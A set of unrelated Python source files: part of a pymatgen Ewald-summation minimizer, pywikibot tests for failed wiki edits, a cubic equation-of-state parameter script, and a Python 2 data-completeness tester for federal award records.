np.sum(matrix) + np.inner(sums[::-1], fractions - 1) \ + interaction_correction return best_case def get_next_index(self, matrix, manipulation, indices_left): """ Returns an index that should have the most negative effect on the matrix sum """ f = manipulation[0] indices = list(indices_left.intersection(manipulation[2])) sums = np.sum(matrix[indices], axis=1) if f < 1: next_index = indices[sums.argmax(axis=0)] else: next_index = indices[sums.argmin(axis=0)] return next_index def _recurse(self, matrix, m_list, indices, output_m_list=[]): """ This method recursively finds the minimal permutations using a binary tree search strategy. Args: matrix: The current matrix (with some permutations already performed). 
m_list: The list of permutations still to be performed indices: Set of indices which haven't had a permutation performed on them. """ # check to see if we've found all the solutions that we need if self._finished: return # if we're done with the current manipulation, pop it off. while m_list[-1][1] == 0: m_list = copy(m_list) m_list.pop() # if there are no more manipulations left to do check the value if not m_list: matrix_sum = np.sum(matrix) if matrix_sum < self._current_minimum: self.add_m_list(matrix_sum, output_m_list) return # if we wont have enough indices left, return if m_list[-1][1] > len(indices.intersection(m_list[-1][2])): return if len(m_list) == 1 or m_list[-1][1] > 1: if self.best_case(matrix, m_list, indices) > self._current_minimum: return index = self.get_next_index(matrix, m_list[-1], indices) m_list[-1][2].remove(index) # Make the matrix and new m_list where we do the manipulation to the # index that we just got matrix2 = np.copy(matrix) m_list2 = deepcopy(m_list) output_m_list2 = copy(output_m_list) matrix2[index, :] *= m_list[-1][0] matrix2[:, index] *= m_list[-1][0] output_m_list2.append([index, m_list[-1][3]]) indices2 = copy(indices) indices2.remove(index) m_list2[-1][1] -= 1 # recurse through both the modified and unmodified matrices self._recurse(matrix2, m_list2, indices2, output_m_list2) self._recurse(matrix, m_list, indices, output_m_list) @property def best_m_list(self): return self._best_m_list @property def minimized_sum(self): return self._minimized_sum @property def output_lists(self): return self._output_lists def compute_average_oxidation_state(site): """ Calculates the average oxidation state of a site Args: site: Site to compute average oxidation state Returns: Average oxidation state of site. """ try: avg_oxi = sum([sp.oxi_state * occu for sp, occu in site.species_and_occu.items() if sp is not None]) return avg_oxi except AttributeError: pass try: return site.charge except AttributeError: raise ValueError("Ewald summation can only be performed on structures " "that are either oxidation state decorated or have " "site charges.")
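# A minimal usage sketch (illustrative, not part of this module): build an
# oxidation-state-decorated structure and evaluate the Ewald sum with the
# class above. The import path and the rock-salt lattice constant are
# assumptions of the example; older pymatgen releases expose Lattice and
# Structure at the package top level instead.
if __name__ == "__main__":
    from pymatgen.core import Lattice, Structure

    lattice = Lattice.cubic(5.692)  # illustrative NaCl conventional cell, Angstrom
    structure = Structure(
        lattice,
        ["Na", "Na", "Na", "Na", "Cl", "Cl", "Cl", "Cl"],
        [[0, 0, 0], [0.5, 0.5, 0], [0.5, 0, 0.5], [0, 0.5, 0.5],
         [0.5, 0, 0], [0, 0.5, 0], [0, 0, 0.5], [0.5, 0.5, 0.5]])
    # The summation requires charges on every site.
    structure.add_oxidation_state_by_element({"Na": 1, "Cl": -1})

    ewald = EwaldSummation(structure, compute_forces=False)
    print(ewald.total_energy)        # eV for the whole cell
    print(ewald.get_site_energy(0))  # eV contribution of site 0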
# -*- coding: utf-8 -*- """ Tests for edit failures. These tests should never write to the wiki, unless something has broken badly. These tests use special code 'write = -1' for edit failures. """ # # (C) Pywikibot team, 2014-2019 # # Distributed under the terms of the MIT license. # from __future__ import absolute_import, division, unicode_literals import pywikibot from pywikibot import ( config, Error, NoPage, LockedPage, SpamfilterError, TitleblacklistError, OtherPageSaveError, NoCreateError, PageCreatedConflict, ) from tests import patch from tests.aspects import unittest, TestCase, WikibaseTestCase class TestSaveFailure(TestCase): """Test cases for edits which should fail to save.""" user = True write = -1 family = 'wikipedia' code = 'test' def test_protected(self): """Test that protected titles raise the appropriate exception.""" if self.site.has_group('sysop'): self.skipTest( 'Testing failure of edit protected with a sysop account') page = pywikibot.Page(self.site, 'Wikipedia:Create a new page') self.assertRaises(LockedPage, page.save) def test_spam(self): """Test that spam in content raise the appropriate exception.""" page = pywikibot.Page(self.site, 'Wikipedia:Sandbox') page.text = 'http://badsite.com' try: self.assertRaisesRegex(SpamfilterError, 'badsite.com', page.save) except OtherPageSaveError as e: self.skipTest(e) def test_titleblacklist(self): """Test that title blacklist raise the appropriate exception.""" page = pywikibot.Page(self.site, 'User:UpsandDowns1234/Blacklisttest') self.assertRaises(TitleblacklistError, page.save) def test_nobots(self): """Test that {{nobots}} raise the appropriate exception.""" page = pywikibot.Page(self.site, 'User:John Vandenberg/nobots') with patch.object(config, 'ignore_bot_templates', False): self.assertRaisesRegex(OtherPageSaveError, 'nobots', page.save) def test_touch(self): """Test that Page.touch() does not do a real edit.""" page = pywikibot.Page(self.site, 'User:Xqt/sandbox') old_text = page.text page.text += '\n*Add a new line to page' page.touch() new_text = page.get(force=True) self.assertEqual(old_text, new_text) def test_createonly(self): """Test that Page.save with createonly fails if page exists.""" page = pywikibot.Page(self.site, 'User:Xqt/sandbox') self.assertRaises(PageCreatedConflict, page.save, createonly=True) def test_nocreate(self): """Test that Page.save with nocreate fails if page does not exist.""" page = pywikibot.Page(self.site, 'User:John_Vandenberg/no_recreate') self.assertRaises(NoCreateError, page.save, nocreate=True) def test_no_recreate(self): """Test that Page.save with recreate disabled fails if page existed.""" page = pywikibot.Page(self.site, 'User:John_Vandenberg/no_recreate') self.assertRaisesRegex(OtherPageSaveError, "Page .* doesn't exist", page.save, recreate=False) class TestActionFailure(TestCase): """Test cases for actions which should fail to save.""" user = True write = -1 family = 'wikipedia' code = 'test' def test_movepage(self): """Test that site.movepage raises the appropriate exceptions.""" mysite = self.get_site() mainpage = self.get_mainpage() if 'move' not in mysite.tokens: self.skipTest( "movepage test requires 'move' token not given to user on {}" .format(self.site)) self.assertRaises(Error, mysite.movepage, mainpage, mainpage.title(), 'test') page_from = self.get_missing_article() if not page_from.exists(): self.assertRaises(NoPage, mysite.movepage, page_from, 'Main Page', 'test') class TestWikibaseSaveTest(WikibaseTestCase): """Test case for WikibasePage.save on Wikidata test 
site.""" family = 'wikidata' code = 'test' user = True write = -1 def test_itempage_save(self): """Test ItemPage save method inherited from superclass Page.""" repo = self.get_repo() item = pywikibot.ItemPage(repo, 'Q6') self.assertRaises(pywikibot.PageNotSaved, item.save) def _make_WbMonolingualText_claim(self, repo, text, language): """Make a WbMonolingualText and set its value.""" claim = pywikibot.page.Claim(repo, 'P271', datatype='monolingualtext') target = pywikibot.WbMonolingualText(text=text, language=language) claim.setTarget(target) return claim def test_WbMonolingualText_invalid_language(self): """Attempt adding a monolingual text with an invalid language.""" repo = self.get_repo() item = pywikibot.ItemPage(repo, 'Q68') claim = self._make_WbMonolingualText_claim(repo, text='Test this!', language='foo') self.assertRaisesRegex( OtherPageSaveError, r'Edit to page \[\[(wikidata:test:)?Q68]] failed:\n' r'modification-failed: "foo" is not a known language code.', item.addClaim, claim) def test_WbMonolingualText_invalid_text(self): """Attempt adding a monolingual text with invalid non-string text.""" repo = self.get_repo() item = pywikibot.ItemPage(repo, 'Q68') claim = self._make_WbMonolingualText_claim(repo, text=123456, language='en') self.assertRaisesRegex( OtherPageSaveError, r'Edit to page \[\[(wikidata:test:)?Q68]] failed:', item.addClaim, claim) def test_math_invalid_function(self): """Attempt adding invalid latex to a math claim.""" repo = self.get_repo() item = pywikibot.ItemPage(repo, 'Q68') claim = pywikibot.page.Claim(repo, 'P717', datatype='math') claim.setTarget('\foo') self.assertRaisesRegex( OtherPageSaveError, r'Edit to page \[\[(wikidata:test:)?Q68]] failed:\n' r'modification-failed: Malformed input:', item.addClaim, claim) def test_url_malformed_url(self): """Attempt adding a malformed URL to a url claim.""" repo = self.get_repo() item = pywikibot.ItemPage(repo, 'Q68') claim = pywikibot.page.Claim(repo, 'P506', datatype='url') claim.setTarget('Not a URL at all') self.assertRaisesRegex( OtherPageSaveError, r'Edit to page \[\[(wikidata:test:)?Q68]] failed:\n' r'modification-failed: This URL misses a scheme like "https://": ' r'Not a URL at all', item.addClaim, claim) def test_url_invalid_protocol(self): """Attempt adding a URL with an invalid protocol to a url claim.""" repo = self.get_repo() item = pywikibot.ItemPage(repo, 'Q68') claim = pywikibot.page.Claim(repo, 'P506', datatype='url') claim.setTarget('wtf://wikiba.se') self.assertRaisesRegex( OtherPageSaveError, r'Edit to page \[\[(wikidata:test:)?Q68]] failed:\n' r'modification-failed: An URL scheme "wtf" is not supported.', item.addClaim, claim) if __name__ == '__main__': # pragma: no cover try: unittest.main() except SystemExit: pass
import numpy as np # import pandas as pd # import math # import matplotlib as plt # import matplotlib.pyplot as plt # import os from pure_data import Data_parse #from .cubic_parameters_1 import Parameter_eos, getdel1, compressibility_factor_cal, acentric_factor_cal from cubic_parameters_1 import Parameter_eos, getdel1, compressibility_factor_cal, acentric_factor_cal from constans import RGAS, A0, B0, C0, A1, B1, C1, D # ----------------------------------------------------------------------- # ----------------------------------------------------------------------- def initial_data(omega, delta_1, NMODEL, ICALC, Pc, dinputs): Zc, OMa, OMb = compressibility_factor_cal(delta_1) # initial guess for k parameter rk = (A1 * Zc + A0) * omega**2 + (B1 * Zc + B0) * omega + (C1 * Zc + C0) # rk = rk * 1.2 # 1.1 #5.2 #3.2 if ICALC == 'constants_eps' or ICALC == 'parameters_eps' or ICALC == 'rk_param': rk *= 1.5 Tr = 0.7 Pvdat = Pc * 10 ** -(1.0 + omega) elif ICALC == 'density': # 5.2 es otro valor que se puede usar en lugar de 1.5 rk = rk * 1.5 Tr_calculada = dinputs[4] / dinputs[0] Tr = Tr_calculada Pvdat = Pc * 10 ** -((1.0 / Tr - 1.0) * 7 * (1.0 + omega) / 3) return rk, Pvdat, Tr def data_in(ICALC, dinputs): if ICALC == 'constants_eps': # CONSTANTS SPECIFICATION (Tc,Pc,OM,Vceos) Tc, Pc, OM, Vceos = dinputs[0], dinputs[1], dinputs[2], dinputs[3] if ICALC == 'parameters_eps': ac, b, del1, rk = dinputs[0], dinputs[1], dinputs[2], dinputs[3] if ICALC == 'rk_param': # dinputs = np.array([Tc, Pc, OM, dc, zrat, ac, b, d, rk]) Tc, Pc, OM, Vceos, delta_1 = dinputs[0], dinputs[1], dinputs[2], dinputs[3], dinputs[7] if ICALC == 'density': Tc, Pc, omega, Vceos, delta_1 = dinputs[0], dinputs[1], dinputs[2], dinputs[3], dinputs[4] T_especific, RHOLSat_esp = dinputs[5], dinputs[6] # -------------------------------------------------------------------------- def require_ID(func): def wrapper(*arg): return Control_arguments(arg[0], arg[1]) return wrapper # @require_ID def models_eos_cal(NMODEL, ICALC, dinputs): if NMODEL == 'SRK' or NMODEL == 'PR': # CONSTANTS SPECIFICATION READ [Tc, Pc, OM] if ICALC == 'constants_eps': Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] if NMODEL == 'SRK': rm = 0.48 + 1.574 * OM - 0.175 * OM**2 del1 = 1.0 elif NMODEL == 'PR': rm = 0.37464 + 1.54226 * OM - 0.26992 * OM ** 2 del1 = 1.0 + np.sqrt(2.0) Zc, OMa, OMb = compressibility_factor_cal(del1) Vceos = (Zc * RGAS * Tc) / Pc ac = OMa * (RGAS * Tc) ** 2 / Pc b = OMb * (RGAS * Tc) / Pc params = [ac, b, rm, del1] # PARAMETERS SPECIFICATION READ [ac, b, rm] if ICALC == 'parameters_eps': ac = dinputs[0] b = dinputs[1] rm = dinputs[2] Tc = (OMb * ac) / (OMa * RGAS * b) Pc = OMb * RGAS * Tc / b Vceos = Zc * RGAS * Tc / Pc if NMODEL == 'SRK': del1 = 1.0 al = -0.175 be = 1.574 ga = 0.48 - rm elif NMODEL == 'PR': del1 = 1.0 + np.sqrt(2.0) al = -0.26992 be = 1.54226 ga = 0.37464 - rm OM = acentric_factor_cal(al, be, ga) constants = [Tc, Pc, OM, Vceos] elif NMODEL == 'RKPR': if ICALC == 'constants_eps': # CONSTANTS SPECIFICATION READ [Tc, Pc, OM, Vceos] Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] Vceos = dinputs[3] Zc = Pc * Vceos / (RGAS * Tc) del1ini = D[0] + D[1] * (D[2] - Zc) ** D[3] + D[4] * (D[2] - Zc) ** D[5] print('del1ini = {0}'.format(del1ini)) delta_1 = getdel1(Zc, del1ini)[0] Zc, OMa, OMb = compressibility_factor_cal(delta_1) print('Zc = {0}'.format(Zc)) ac = OMa * (RGAS * Tc) ** 2 / Pc b = OMb * (RGAS * Tc) / Pc # calcular rk rk, Pvdat, Tr = initial_data(OM, delta_1, NMODEL, ICALC, Pc, dinputs) eos_calculation = Parameter_eos() 
rk_cal = eos_calculation.resolver_rk_cal(rk, delta_1, Pvdat, Pc, Tc, Tr) # rk = 1 params = [ac, b, rk, delta_1] elif ICALC == 'parameters_eps': # PARAMETERS SPECIFICATION READ [ac, b, rk, del1] ac = dinputs[0] b = dinputs[1] del1 = dinputs[2] rk = dinputs[3] Zc, OMa, OMb = compressibility_factor_cal(del1) Tc = OMb * ac / (OMa * RGAS * b) Pc = OMb * RGAS * Tc / b Vceos = Zc * RGAS * Tc / Pc al = A1 * Zc + A0 be = B1 * Zc + B0 ga = C1 * Zc + C0 - rk OM = acentric_factor_cal(al, be, ga) constants = [Tc, Pc, OM, Vceos] elif ICALC == 'rk_param': # CONSTANTS SPECIFICATION and del1 READ [Tc, Pc, OM, del1] Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] delta_1 = dinputs[7] rk, Pvdat, Tr = initial_data(OM, delta_1, NMODEL, ICALC, Pc, dinputs) eos_calculation = Parameter_eos() rk_cal = eos_calculation.resolver_rk_cal(rk, delta_1, Pvdat, Pc, Tc, Tr) elif ICALC == 'density': # CONSTANTS SPECIFICATION and (T, RhoLsat) READ [Tc, Pc, OM, del1, T, RHOLsat] # Trho = T / Tc, read initial value of del1 Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] delta_1 = dinputs[3] T_especific = dinputs[4] RHOLSat_esp = dinputs[5] rk, Pvdat, Tr = initial_data(OM, delta_1, NMODEL, ICALC, Pc, dinputs) eos_calculation = Parameter_eos() delta_1_parameter = eos_calculation.resolver_delta_1_cal(delta_1, rk, Pvdat, RHOLSat_esp, Pc, Tc, Tr) print('The NMODEL is eos_{0} and method ICALC is {1}'.format(NMODEL, ICALC)) if ICALC == 'constants_eps': print("params = [ac, b, rm, del1]") #ac, b, rm, del1 = params #print("ac = {0} b = {1} rm = {2} del1 = {3}".format(ac, b, rm, del1)) return params elif ICALC == 'parameters_eps': print("constants = [Tc, Pc, OM, Vceos]") print(constants) return constants elif ICALC == 'rk_param': print('The parameter rk_cal is {0}'.format(rk_cal)) return rk_cal elif ICALC == 'density': print('The parameter delta1(rho,T) = {0}'.format(delta_1_parameter)) return delta_1_parameter def print_properties_component(component, properties_component): print ('Component = {0}'.format(component)) print ('Acentric_factor = {0}'.format(properties_component[1]['Omega'])) print ('Critical_Temperature = {0} K'.format(properties_component[1]['Tc'])) print ('Critical_Pressure = {0} Bar'.format(properties_component[1]['Pc'])) print ('Critical_Volume = {0} cm3/mol'.format(properties_component[1]['Vc'])) print ('Compressibility_factor_Z = {0}'.format(properties_component[1]['Zc'])) print ("\n") # ----------------------------------------------------------------------- # ----------------------------------------------------------------------- class ClassName(Data_parse): """docstring for ClassName""" def __init__(self, component, NMODEL, ICALC): self.component = component self.NMODEL = NMODEL self.ICALC = ICALC def properties_component(self): properties_comp = self.selec_component(self.component) return properties_comp # dinputs = np.array([properties_component[1]['Tc'], properties_component[1]['Pc'], # properties_component[1]['Omega'], properties_component[1]['Vc']]) # component_eos = models_eos_cal(NMODEL, ICALC, dinputs) # def print_properties_component(self, component, properties_component): def print_properties_component(self): print('Component = {0}'.format(self.component)) print('Acentric_factor = {0}'.format(self.properties_component()[1]['Omega'])) print('Critical_Temperature = {0} K'.format(self.properties_component()[1]['Tc'])) print('Critical_Pressure = {0} Bar'.format(self.properties_component()[1]['Pc'])) print('Critical_Volume = {0} cm3/mol'.format(self.properties_component()[1]['Vc'])) 
print('Compressibility_factor_Z = {0}'.format(self.properties_component()[1]['Zc'])) print("\n") def initial_data(self, omega, delta_1, NMODEL, ICALC, Pc, dinputs): Zc, OMa, OMb = compressibility_factor_cal(delta_1) # initial guess for k parameter rk = (A1 * Zc + A0) * omega**2 + (B1 * Zc + B0) * omega + (C1 * Zc + C0) # rk = rk * 1.2 # 1.1 #5.2 #3.2 if ICALC == 'constants_eps' or ICALC == 'parameters_eps' or ICALC == 'rk_param': rk *= 1.5 Tr = 0.7 Pvdat = Pc * 10 ** -(1.0 + omega) elif ICALC == 'density': # 5.2 es otro valor que se puede usar en lugar de 1.5 rk = rk * 1.5 Tr_calculada = dinputs[4] / dinputs[0] Tr = Tr_calculada Pvdat = Pc * 10 ** -((1.0 / Tr - 1.0) * 7 * (1.0 + omega) / 3) return rk, Pvdat, Tr def models_eos_cal(self, NMODEL, ICALC, dinputs): if NMODEL == 'SRK' or NMODEL == 'PR': # CONSTANTS SPECIFICATION READ [Tc, Pc, OM] if ICALC == 'constants_eps': Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] if NMODEL == 'SRK': rm = 0.48 + 1.574 * OM - 0.175 * OM**2 del1 = 1.0 elif NMODEL == 'PR': rm = 0.37464 + 1.54226 * OM - 0.26992 * OM ** 2 del1 = 1.0 + np.sqrt(2.0) Zc, OMa, OMb = compressibility_factor_cal(del1) Vceos = (Zc * RGAS * Tc) / Pc ac = OMa * (RGAS * Tc) ** 2 / Pc b = OMb * (RGAS * Tc) / Pc params = [ac, b, rm, del1] # PARAMETERS SPECIFICATION READ [ac, b, rm] if ICALC == 'parameters_eps': ac = dinputs[0] b = dinputs[1] rm = dinputs[2] Tc = (OMb * ac) / (OMa * RGAS * b) Pc = OMb * RGAS * Tc / b Vceos = Zc * RGAS * Tc / Pc if NMODEL == 'SRK': del1 = 1.0 al = -0.175 be = 1.574 ga = 0.48 - rm elif NMODEL == 'PR': del1 = 1.0 + np.sqrt(2.0) al = -0.26992 be = 1.54226 ga = 0.37464 - rm OM = acentric_factor_cal(al, be, ga) constants = [Tc, Pc, OM, Vceos] elif NMODEL == 'RKPR': if ICALC == 'constants_eps': # CONSTANTS SPECIFICATION READ [Tc, Pc, OM, Vceos] Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] Vceos = dinputs[3] Zc = Pc * Vceos / (RGAS * Tc) del1ini = D[0] + D[1] * (D[2] - Zc) ** D[3] + D[4] * (D[2] - Zc)** D[5] print('del1ini = {0}'.format(del1ini)) delta_1 = getdel1(Zc, del1ini)[0] Zc, OMa, OMb = compressibility_factor_cal(delta_1) print('Zc = {0}'.format(Zc)) ac = OMa * (RGAS * Tc) ** 2 / Pc b = OMb * (RGAS * Tc) / Pc # calcular rk rk, Pvdat, Tr = initial_data(OM, delta_1, NMODEL, ICALC, Pc, dinputs) eos_calculation = Parameter_eos() rk_cal = eos_calculation.resolver_rk_cal(rk, delta_1, Pvdat, Pc, Tc, Tr) # rk = 1 params = [ac, b, rk, delta_1] elif ICALC == 'parameters_eps': # PARAMETERS SPECIFICATION READ [ac, b, rk, del1] ac = dinputs[0] b = dinputs[1] del1 = dinputs[2] rk = dinputs[3] Zc, OMa, OMb = compressibility_factor_cal(del1) Tc = OMb * ac / (OMa * RGAS * b) Pc = OMb * RGAS * Tc / b Vceos = Zc * RGAS * Tc / Pc al = A1 * Zc + A0 be = B1 * Zc + B0 ga = C1 * Zc + C0 - rk OM = acentric_factor_cal(al, be, ga) constants = [Tc, Pc, OM, Vceos] elif ICALC == 'rk_param': # CONSTANTS SPECIFICATION and del1 READ [Tc, Pc, OM, del1] Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] delta_1 = dinputs[7] rk, Pvdat, Tr = initial_data(OM, delta_1, NMODEL, ICALC, Pc, dinputs) eos_calculation = Parameter_eos() rk_cal = eos_calculation.resolver_rk_cal(rk, delta_1, Pvdat, Pc, Tc, Tr) elif ICALC == 'density': # CONSTANTS SPECIFICATION and (T, RhoLsat) READ [Tc, Pc, OM, del1, T, RHOLsat] # Trho = T / Tc, read initial value of del1 Tc = dinputs[0] Pc = dinputs[1] OM = dinputs[2] delta_1 = dinputs[3] T_especific = dinputs[4] RHOLSat_esp = dinputs[5] rk, Pvdat, Tr = initial_data(OM, delta_1, NMODEL, ICALC, Pc, dinputs) eos_calculation = Parameter_eos() delta_1_parameter = 
eos_calculation.resolver_delta_1_cal(delta_1, rk, Pvdat, RHOLSat_esp, Pc, Tc, Tr) print('The NMODEL is eos_{0} and method ICALC is {1}'.format(NMODEL, ICALC)) if ICALC == 'constants_eps': print("params = [ac, b, rm, del1]") #ac, b, rm, del1 = params #print("ac = {0} b = {1} rm = {2} del1 = {3}".format(ac, b, rm, del1)) return params elif ICALC == 'parameters_eps': print("constants = [Tc, Pc, OM, Vceos]") print(constants) return constants elif ICALC == 'rk_param': print('The parameter rk_cal is {0}'.format(rk_cal)) return rk_cal elif ICALC == 'density': print('The parameter delta1(rho,T) = {0}'.format(delta_1_parameter)) return delta_1_parameter # ---------------------------------------------------------------------------------- component = "ISOBUTANE" NMODEL = "RKPR" ICALC = "constants_eps" # ICALC = "density" sustance_pure = ClassName(component, NMODEL, ICALC) pure = sustance_pure.properties_component() print(pure) # ---------------------------------------------------------------------------------- properties_data = Data_parse() # properties_component = properties_data.selec_component(dppr_file, component) properties_component = properties_data.selec_component(component) print_properties_component(component, properties_component) dinputs = np.array([properties_component[1]['Tc'], properties_component[1]['Pc'], properties_component[1]['Omega'], properties_component[1]['Vc']]) def data_in(ICALC, dinputs): if ICALC == 'constants_eps': # CONSTANTS SPECIFICATION (Tc,Pc,OM,Vceos) Tc, Pc, OM, Vceos = dinputs[0], dinputs[1], dinputs[2], dinputs[3] if ICALC == 'parameters_eps': ac, b, del1, rk = dinputs[0], dinputs[1], dinputs[2], dinputs[3] if ICALC == 'rk_param': # dinputs = np.array([Tc, Pc, OM, dc, zrat, ac, b, d, rk]) Tc, Pc, OM, Vceos, delta_1 = dinputs[0], dinputs[1], dinputs[2], dinputs[3], dinputs[7] if ICALC == 'density': Tc, Pc, omega, Vceos, delta_1 = dinputs[0], dinputs[1], dinputs[2], dinputs[3], dinputs[4] T_especific, RHOLSat_esp = dinputs[5], dinputs[6] sustance_pure.models_eos_cal(NMODEL, ICALC, dinputs) def main(): print("-" * 79) # component = 'METHANE' # component = "ETHANE" # component = "3-METHYLHEPTANE" # component = "n-PENTACOSANE" component = "ISOBUTANE" #NMODEL = "RKPR" NMODEL = "PR" ICALC = "constants_eps" # ICALC = "density" properties_data = Data_parse() # properties_component = properties_data.selec_component(dppr_file, component) properties_component = properties_data.selec_component(component) print_properties_component(component, properties_component) dinputs = np.array([properties_component[1]['Tc'], properties_component[1]['Pc'], properties_component[1]['Omega'], properties_component[1]['Vc']]) component_eos = models_eos_cal(NMODEL, ICALC, dinputs) # print(component_eos[0]) print('-' * 79) #if __name__ == '__main__': # main() # ------------------------------------------------------------------------
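# A minimal usage sketch (illustrative): the same flow as main() above, run
# for a different pure component with the SRK model. Availability of the
# component in the DPPR data file is an assumption of the example.
def example_srk_constants(component="ETHANE"):
    properties_data = Data_parse()
    properties_component = properties_data.selec_component(component)
    print_properties_component(component, properties_component)

    dinputs = np.array([properties_component[1]['Tc'],
                        properties_component[1]['Pc'],
                        properties_component[1]['Omega'],
                        properties_component[1]['Vc']])

    # For ICALC == 'constants_eps' this returns params = [ac, b, rm, del1]
    return models_eos_cal("SRK", "constants_eps", dinputs)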
#!/bin/python import sys, csv, os, imp, pickle from settings import * from completeness.statlib import stats from decimal import Decimal import doctest BOOKMARK = 'completeness/bookmark.pickle' def success_rate(year): f = open('completeness/output/%d.pickle' % year, 'r') obj = pickle.load(f) f.close() program_totals = {} for program in obj: program_sum = 0 program_total = 0 if program!='__all__': for (test, result) in obj[program].items(): test_name = test.replace('metric_completeness.', '') # if test_name=='obligation_action_date_is_properly_formatted': if result.tests_completed_without_error>0: rate = (result.sum / (result.tests_completed_without_error * 1.0)) else: rate = 0 print "%7s %20s %f" % (program, test_name, rate) program_sum += result.sum program_total += result.tests_completed_without_error if program_total > 0: program_totals[program] = program_sum / (program_total * 1.0) for (p, r) in program_totals.items(): print "%7s %f" % (p, r) class Result(object): """ Stores the results of our metric tests. A bit fancier than a dict. """ def __init__(self, result_type="boolean"): super(Result, self).__init__() self.result_type = result_type self.tests_run = 0 self.tests_completed_without_error = 0 self.failed_tests = 0 self.dollars_sum = 0 self.dollars_of_passed_tests = 0 self.dollars_of_failed_tests = 0 self.sum = 0 self.values = [] if result_type in ('real', 'integer'): self.mean = None self.std_dev = None if self.result_type is 'integer': self.histogram = {} def record_attempt(self): """ To be called prior to running the metric/test """ self.tests_run += 1 def record_success(self): """ To be called after the successful completion of the metric/test """ self.tests_completed_without_error += 1 def record_val(self, val, *args, **kwargs): """ To be passed the result of the metric/test """ if kwargs.has_key('dollars') and kwargs['dollars'] is not None: self.dollars_sum += abs(kwargs['dollars']) if val is False: self.failed_tests += 1 if self.result_type is 'boolean': if val is True: self.sum += 1 if kwargs.has_key('dollars') and kwargs['dollars'] is not None: self.dollars_of_passed_tests += abs(kwargs['dollars']) elif val is False: if kwargs.has_key('dollars') and kwargs['dollars'] is not None: self.dollars_of_failed_tests += abs(kwargs['dollars']) else: self.sum += val self.values.append(val) if self.result_type is 'integer': if not self.histogram.has_key(val): self.histogram[val] = 0 self.histogram[val] += 1 def finish(self): if self.result_type in ('integer', 'real'): if len(self.values)>0: self.mean = stats.mean(self.values) if len(self.values)>1: self.std_dev = stats.stdev(self.values) self.count = len(self.values) # this should be the same as self.tests_completed_without_error, but is a little clearer for adding stats del self.values # no need to keep all that garbage self.values = [] # main tester object class MetricTester(object): """ Performs specified tests on rows >>> m = MetricTester() '' """ def __init__(self): super(MetricTester, self).__init__() self.finished = False self.results = {} self.results['__all__'] = Result() self.misreported_dollars = {} self.total_dollars = {} # bootstrap tests self.metrics = {} for filename in os.listdir('./completeness/metrics'): if filename[-3:]==".py" and not "__init__" in filename: module_name = filename[:-3] m = __import__('completeness.metrics.%s' % module_name) for candidate_name in dir(m.metrics.metric_completeness): candidate = getattr(m.metrics.metric_completeness, candidate_name) if callable(candidate): if getattr(candidate, 
'is_metric', False): self.metrics["%s.%s" % (module_name, candidate_name)] = candidate def record_dollars(self, cfda_program, misreported_dollars, total_dollars): if not self.misreported_dollars.has_key(cfda_program): self.misreported_dollars[cfda_program] = 0 self.misreported_dollars[cfda_program] += abs(misreported_dollars) if not self.total_dollars.has_key(cfda_program): self.total_dollars[cfda_program] = 0 self.total_dollars[cfda_program] += abs(total_dollars) def _row_to_dict(self, row): """ Turns the incoming row into a hash for ease of use """ r = {} for (field_index, field_name) in enumerate(CANONICAL_FIELD_ORDER): if field_index < len(row): r[field_name] = row[field_index] return r def run_metrics(self, row): """ runs the specified metrics/tests on the passed row (which is a dict) """ self.finished = False # if necessary, convert to a hash for convenience of the metric test functions if type(row) is list: row = self._row_to_dict(row) dollars = None try: amt = len(str(row['fed_funding_amount']).strip())>0 and str(row['fed_funding_amount']) or '0' dollars = Decimal(amt) except Exception, e: dollars = 0 row_all_clean = True for (metric_name, metric_func) in self.metrics.items(): # set up necessary hashes and result objects cfda_number = row['cfda_program_num'] if not self.results.has_key(cfda_number): self.results[cfda_number] = {} if not self.results[cfda_number].has_key('__all__'): self.results[cfda_number]['__all__'] = Result() if not self.results[cfda_number].has_key('__byrow__'): self.results[cfda_number]['__byrow__'] = Result() if not self.results[cfda_number].has_key(metric_name): self.results[cfda_number][metric_name] = Result(result_type=metric_func.metric_type) mf = metric_func(row) for t in (self.results[cfda_number][metric_name], self.results[cfda_number]['__all__'], self.results['__all__']): t.record_attempt() t.record_val(mf, dollars=dollars) t.record_success() row_all_clean = row_all_clean and mf # record by-row metric -- if it passed all tests, it's okay # this lets us only count problem rows once if row_all_clean: self.record_dollars(cfda_program=cfda_number, misreported_dollars=0, total_dollars=dollars) else: self.record_dollars(cfda_program=cfda_number, misreported_dollars=dollars, total_dollars=dollars) def finish(self): """ calculate aggregate values """ for cfda_program_num in self.results: if cfda_program_num!='__all__': for metric in self.results[cfda_program_num].keys(): self.results[cfda_program_num][metric].finish() self.results['__all__'].finish() self.finished = True def emit(self, filename=None): """ spits out a pickled object of the results """ if not self.finished: self.finish() if filename is None: return pickle.dumps(self.results) else: f = open(filename, 'w') pickle.dump(self.results, f) f.close() def emit_dollars(self, filename_misreported, filename_total): f = open(filename_misreported, 'w') pickle.dump(self.misreported_dollars, f) f.close() f = open(filename_total, 'w') pickle.dump(self.total_dollars, f) f.close() def main_csv(): for year in FISCAL_YEARS: print "Processing FAADS results for %d" % year mtester = MetricTester() f = open('completeness/csv/%d.csv' % year, 'r') reader = csv.reader(f) i = 0 for row in reader: row = mtester._row_to_dict(row) mtester.run_metrics(row) if (i%10000)==0: print " processing record %d" % i i += 1 f.close() mtester.emit(filename='completeness/output/%d.pickle' % year) mtester.emit_dollars(filename_misreported='completeness/output/%d-dollars_misreported.pickle' % year, 
filename_total='completeness/output/%d-dollars_total.pickle' % year) def main(): main_csv() if __name__ == '__main__': if '--test' in sys.argv: doctest.testmod()
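# A minimal sketch (illustrative) of the kind of callable MetricTester
# discovers: a function in completeness/metrics/metric_completeness.py marked
# with ``is_metric`` and carrying a ``metric_type``. The field name comes from
# the test name referenced in success_rate() above; the exact validation rule
# shown here is an assumption for the example.
def obligation_action_date_is_present(row):
    """Boolean metric: passes when the row carries a non-blank action date."""
    return len(str(row.get('obligation_action_date', '')).strip()) > 0

obligation_action_date_is_present.is_metric = True
obligation_action_date_is_present.metric_type = 'boolean'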
